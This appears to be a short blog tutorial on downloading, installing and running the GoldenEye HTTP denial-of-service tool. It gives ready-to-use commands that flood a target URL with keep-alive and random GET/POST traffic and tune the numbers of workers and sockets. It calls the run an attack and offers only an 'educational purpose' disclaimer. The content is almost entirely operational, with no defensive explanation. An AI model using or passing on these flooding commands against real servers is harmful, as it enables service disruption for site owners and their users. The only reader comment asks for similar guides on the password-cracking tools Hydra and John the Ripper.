Golden Eye DDoS Tool: Installation and Tool usage with examples

GoldenEye is one of the popular HTTP Denial Of Service Tools. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets HTTP/S server.

This tool can be used for Load Testing and testing of Network devices.

Download Link: https://sourceforge.net/projects/goldeneye/?source=typ_redirect

Click on the Download button to download the tool

Installation:

Zip files generally downloaded in the directory Downloads

Extract files from GoldenEye-master.zip

#unzip GoldenEye-master.zip

Check extracted files

#cd GoldenEye-master
#ls

Tool Usage:

Right-click in the directory GoldenEye-master and click Open in Terminal.

1. To display all usage options

#sudo ./goldeneye.py -h

2. To send traffic to the target machine

#sudo ./goldeneye.py <url>
#sudo ./goldeneye.py http://192.168.0.233:80/
#sudo ./goldeneye.py http://www.testurl.com

Use Ctrl + C to end attack

You can use the Wireshark tool to capture traffic

3. To send traffic of mode ‘random’ (both GET and POST Request) of 5 workers to the target machine

#sudo ./goldeneye.py  http://192.168.0.233:80/ -w 5 -m random

4. To send traffic in ‘random’ mode with 10 workers running 5 connections each

#sudo ./goldeneye.py  http://192.168.0.233:80/ -s 5 -m random

Similarly, you can use other options to control network traffic.

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

1 Response

  1. CarnageCoder says:

    thank you for the tutorial on GolenEyE. do you have any posts about how to use Hydra or John The Ripper?

Leave a Reply

Your email address will not be published. Required fields are marked *

OWASP API Top 10 - 2023 7 Facts You Should Know About WormGPT OWASP Top 10 for Large Language Models (LLMs) Applications Top 10 Blockchain Security Issues What is Cyber Warfare?